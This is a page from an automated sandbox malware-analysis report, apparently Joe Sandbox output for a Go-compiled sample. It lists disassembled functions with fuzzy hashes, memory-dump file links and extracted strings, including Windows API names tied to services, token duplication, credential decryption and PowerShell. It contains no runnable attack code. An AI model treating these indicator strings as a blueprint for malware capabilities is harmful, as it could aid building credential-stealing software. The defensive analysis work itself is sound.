Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48050f2ec16e3b8aecb6384e8c0f7d5831daa3b2a83c9f4e62d4ad2b2888698f
Instruction ID: 250d596379f88bc910219ddacfffe4ac3921172d374f39d68ccb711e837fb1d4
Opcode Fuzzy Hash: 48050f2ec16e3b8aecb6384e8c0f7d5831daa3b2a83c9f4e62d4ad2b2888698f
Instruction Fuzzy Hash: A341D362704A00CADF14DF76908136AA791E7867A8FC84A35DBFE83BC6D7ACC594C604

Function 00A6D720 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75c56305c252494e6f364b43d37ef13df09164c7c70e2989f1bdf18c0c6b2d59
Instruction ID: c1bb3c0ecdf2de341adf1e4e84c0341147efa78af1d3286c39d4c3ed67a167c6
Opcode Fuzzy Hash: 75c56305c252494e6f364b43d37ef13df09164c7c70e2989f1bdf18c0c6b2d59
Instruction Fuzzy Hash: 1E2109A1F15E444ACA47DB3A8440315D21AAFAABD0F58C722AD1F77795E738D0D24240

Function 00A85020 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a4bede6f9e02918bb6ac0c4cf519a6568467504943447a9e64b0fd256fbe534
Instruction ID: 83c08508542e99235d62a6bc3a0f705c018c5b33ea33b52670a7c6d959573a28
Opcode Fuzzy Hash: 4a4bede6f9e02918bb6ac0c4cf519a6568467504943447a9e64b0fd256fbe534
Instruction Fuzzy Hash: F431A07A718B85C2EB84EB19E58039A67A1F384BC4F84D122DE4E47769DF38C64AC700

Function 00AC2340 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d89687870109af2ef0101b97ce212597612ced05e399126ed5375e281d902f3
Instruction ID: c1ee3223ef3914df3c278b31db4835af2f1894da8a87e1bd7fdd2c28b1de19cc
Opcode Fuzzy Hash: 0d89687870109af2ef0101b97ce212597612ced05e399126ed5375e281d902f3
Instruction Fuzzy Hash: EEC02BF1907BD55CFF20C3047100B003DD1CF443C0F82C0D8C24C44328DA2C92804304

Function 00A76E80 Relevance: 15.4, Strings: 12, Instructions: 351COMMON

Download Yara Rule

Strings

because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp, xrefs: 00A773BC
, not pointer-byte block (3814697265625: unknown pc CertOpenStoreCoTaskMemFreeDeleteServiceEnumProcessesExitWindowsExFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGetClassNameWGetDriveTypeWGunjala_GondiMapViewOfFileMasaram_GondiMende_Kikakui, xrefs: 00A77506
nil elem type!no module datano such devicepowershell.exeprotocol errorruntime: full=runtime: want=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunknown methodunreacha, xrefs: 00A774E5
runtime.SetFinalizer: first argument is runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 called with negative prectime: Stop called on, xrefs: 00A77515
runtime.SetFinalizer: first argument is nilruntime: casfrom_Gscanstatus bad oldval gp=runtime: releaseSudog with non-nil gp.paramruntime:stoplockedm: lockedg (atomicstatus=unfinished open-coded defers in deferreturnunknown runnable goroutine during bootstrapac, xrefs: 00A7752A
runtime.SetFinalizer: pointer not in allocated blockruntime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetcompileCallback: argument size is larger than uintpt, xrefs: 00A774C2
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu, xrefs: 00A7743D
runtime.SetFinalizer: first argument was allocated into an arenaruntime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeList, xrefs: 00A774D3
, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s, xrefs: 00A7741D
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677, xrefs: 00A77336, 00A7738D, 00A773F7
runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884, xrefs: 00A7742C
to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis, xrefs: 00A77321, 00A77378, 00A773E2

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125Arab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWClosePseudoConsoleCloseServiceHandleCommandLineToArgvWCreateFileMappingWCreateWellKnownSidCryptUnp$ to finalizer untyped args -thread limit1907348632812595367431640625CertCloseStoreClearCommBreakClearCommErrorCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateServiceWCryptGenRandomFindFirstFileWFormatMessageWGC assis$, not a function0123456789ABCDEF0123456789abcdef2384185791015625ConnectNamedPipeCreateDirectoryWCreateJobObjectWCreateNamedPipeWCryptProtectDataCryptQueryObjectDefineDosDeviceWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFindFirstVolumeWFlushFileBuffersGC s$, not pointer-byte block (3814697265625: unknown pc CertOpenStoreCoTaskMemFreeDeleteServiceEnumProcessesExitWindowsExFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGetClassNameWGetDriveTypeWGunjala_GondiMapViewOfFileMasaram_GondiMende_Kikakui$nil elem type!no module datano such devicepowershell.exeprotocol errorruntime: full=runtime: want=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunknown methodunreacha$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected runtime.netpoll error: 1776356839400250464677$runtime.SetFinalizer: first argument is nilruntime: casfrom_Gscanstatus bad oldval gp=runtime: releaseSudog with non-nil gp.paramruntime:stoplockedm: lockedg (atomicstatus=unfinished open-coded defers in deferreturnunknown runnable goroutine during bootstrapac$runtime.SetFinalizer: first argument is runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 called with negative prectime: Stop called on$runtime.SetFinalizer: first argument was allocated into an arenaruntime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeList$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeunable to query buffer size from InitializeProcThreadAttributeListbytes.Buffer: UnreadByte: previous operation was not a successfu$runtime.SetFinalizer: pointer not in allocated blockruntime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetcompileCallback: argument size is larger than uintpt$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base1734723475976807094411924481391906738281258673617379884
API String ID: 0-2729006066
Opcode ID: eac11ee3d83c79d4de2fe35663e20ff9b75687c92e18dc1b25158c69745679b4
Instruction ID: 78a9184792e8b3f8e477494d7e8bd9cd449947d18f08715db7e0a23d7f984fc5
Opcode Fuzzy Hash: eac11ee3d83c79d4de2fe35663e20ff9b75687c92e18dc1b25158c69745679b4
Instruction Fuzzy Hash: A5F18132609B8086EB709B21E8413AEB7A5F785B80F98C236DB9D57B69DF3CC455C710

Function 00A7E2AA Relevance: 14.0, Strings: 11, Instructions: 222COMMON

Download Yara Rule

Strings

s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625: unknown pc CertOpenStoreCoTaskMemFreeDeleteServiceEnumProcessesExitWindowsExFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep wait, xrefs: 00A7E3E5
unknown(wsaioctl (forced) -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = 244140625: status=AuthorityB, xrefs: 00A7E49A
+/1;<=CLMPSZ["]_`hs{} + @ P [(") )(), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/??, xrefs: 00A7E5C8
=CLMPSZ["]_`hs{} + @ P [(") )(), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTA, xrefs: 00A7E34E
s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limit152587890625762939453125Bidi_ControlCfgMgr32.dllCoCreateGuidCreateEventWCreateMutexWGetAddrInfoWGetCommStateGetConsoleCPGetLastErrorGetLengt, xrefs: 00A7E405
s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = 244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticFindCloseHex_DigitInheritedInterfaceKhudawadiLocalFreeMSServiceMalayalamMongolianMoveFile, xrefs: 00A7E3C5
<== at fp= is lr: of on pc= sp: sp=) = ) m=+Inf-Inf.bat.cmd.com.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomCESTChamDashEESTGOGCJulyJuneLEAFLisuMiaoModiNZDTNZSTNewaSASTStatThaim=] = ] n=allgallpavx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandead, xrefs: 00A7E625
) = ) m=+Inf-Inf.bat.cmd.com.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomCESTChamDashEESTGOGCJulyJuneLEAFLisuMiaoModiNZDTNZSTNewaSASTStatThaim=] = ] n=allgallpavx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchttpicmpidleigmpint8itab, xrefs: 00A7E5E5
s=nil text= zombie% CPU (, goid=, j0 = 19531259765625: type AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitJanuaryKannadaMUI_DltMUI_StdMakasarMandaicMarchenMultaniMyanmarOctoberOsmanyaPATHEXTRadicalSharadaS, xrefs: 00A7E50E
s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=%!Weekday(, bound = , limit = /dev/stdin12207031256103515625AdditionalBad varintCancelIoExChorasmianClassCHAOSClassCSNETCreateFileCreatePipeDeprecatedDevanagariDnsQuery_WException , xrefs: 00A7E3A8
... MB, and cnt= got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>AdlamAprilBamumBatakBuhidDograErrorGreekKhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageRunicSTermTakriTamilTypeA] = (arraychdirclosedefer, xrefs: 00A7E573, 00A7E671

Memory Dump Source

Source File: 00000000.00000002.2989639575.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2989610306.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989711751.0000000000B7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989817396.0000000000BFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989841063.0000000000C03000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989863475.0000000000C05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989889167.0000000000C06000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989918748.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989942193.0000000000C13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C19000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2989964334.0000000000C6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990085162.0000000000C73000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2990106458.0000000000C79000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: ... MB, and cnt= got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>AdlamAprilBamumBatakBuhidDograErrorGreekKhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageRunicSTermTakriTamilTypeA] = (arraychdirclosedefer$ <== at fp= is lr: of on pc= sp: sp=) = ) m=+Inf-Inf.bat.cmd.com.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomCESTChamDashEESTGOGCJulyJuneLEAFLisuMiaoModiNZDTNZSTNewaSASTStatThaim=] = ] n=allgallpavx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandead$ s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=%!Weekday(, bound = , limit = /dev/stdin12207031256103515625AdditionalBad varintCancelIoExChorasmianClassCHAOSClassCSNETCreateFileCreatePipeDeprecatedDevanagariDnsQuery_WException $ s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limit152587890625762939453125Bidi_ControlCfgMgr32.dllCoCreateGuidCreateEventWCreateMutexWGetAddrInfoWGetCommStateGetConsoleCPGetLastErrorGetLengt$ s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = 244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticFindCloseHex_DigitInheritedInterfaceKhudawadiLocalFreeMSServiceMalayalamMongolianMoveFile$ s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625: unknown pc CertOpenStoreCoTaskMemFreeDeleteServiceEnumProcessesExitWindowsExFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep wait$ s=nil text= zombie% CPU (, goid=, j0 = 19531259765625: type AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitJanuaryKannadaMUI_DltMUI_StdMakasarMandaicMarchenMultaniMyanmarOctoberOsmanyaPATHEXTRadicalSharadaS$) = ) m=+Inf-Inf.bat.cmd.com.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomCESTChamDashEESTGOGCJulyJuneLEAFLisuMiaoModiNZDTNZSTNewaSASTStatThaim=] = ] n=allgallpavx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchttpicmpidleigmpint8itab$+/1;<=CLMPSZ["]_`hs{} + @ P [(") )(), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/??$=CLMPSZ["]_`hs{} + @ P [(") )(), ->.\0s25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us|0|1} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625:\/???ADTA$unknown(wsaioctl (forced) -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = 244140625: status=AuthorityB
API String ID: 0-3686693708
Opcode ID: 72fa464da754b8d7272439f6af56f9361f2d41b5567d33f16912cc6aac05655e
Instruction ID: bcf13c5877dad8315adfc868e7e7e1a49354ffc54738d59cd2e7100e260fc368
Opcode Fuzzy Hash: 72fa464da754b8d7272439f6af56f9361f2d41b5567d33f16912cc6aac05655e
Instruction Fuzzy Hash: 0C917F76318B8486DF10EB55E98135EB7A4FB89B80F48D421EE8D07B2ADF38C905D721

Function 00A79540 Relevance: 12.8, Strings: 10, Instructions: 256COMMON

Download Yara Rule

Strings

gcBgMarkWorker: blackening not enabledindex out of range [%x] with length %yinsufficient data for base length typeinternal error: exit hook invoked exitm changed unexpectedly in cgocallbackgmakechan: invalid channel element typeruntime: blocked read on free po, xrefs: 00A799E5
GC worker initGetConsoleModeGetProcAddressGetShellWindowGetTickCount64GetUserNameExWIsWellKnownSidIsWow64ProcessLoadLibraryExWMB; allocated MakeAbsoluteSDModule32FirstWNetUserGetInfoOpenSCManagerWOther_ID_StartPattern_SyntaxProcess32NextWQuotation_MarkRCodeNam, xrefs: 00A79583, 00A7959A
work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625: unknown pc CertOpenStoreCoTaskMemFreeDeleteServiceEnumProcessesExitWindowsExFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGetClassNameWGetDriveTypeWGunjala_Gondi, xrefs: 00A798FF, 00A7995F
runtime: work.nwait= stale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/breakpoint trapunexpected value stepuser defined signal 1user defined signal 2%SystemRoot%\system32\4656612873077392578125Aleuti, xrefs: 00A79945
work.nwait= , gp->status=, not pointer-byte block (3814697265625: unknown pc CertOpenStoreCoTaskMemFreeDeleteServiceEnumProcessesExitWindowsExFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGetClassNameWGetDriveTypeWGunjala_GondiMapViewOfFile, xrefs: 00A798E5
gcBgMarkWorker: mode not setgcstopm: negative nmspinninginvalid runtime symbol tablemheap.freeSpanLocked - span missing stack in shrinkstackmspan.sweep: m is not lockednewproc1: new g is not Gdeadnewproc1: newg missing stackos: process already finishedprotocol, xrefs: 00A79996
runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = runtime: traceback stuck. pc=scanobject of a noscan objectsemacquire not on the G stackstring concatenation too longsyntax error scanning boolea, xrefs: 00A798C5
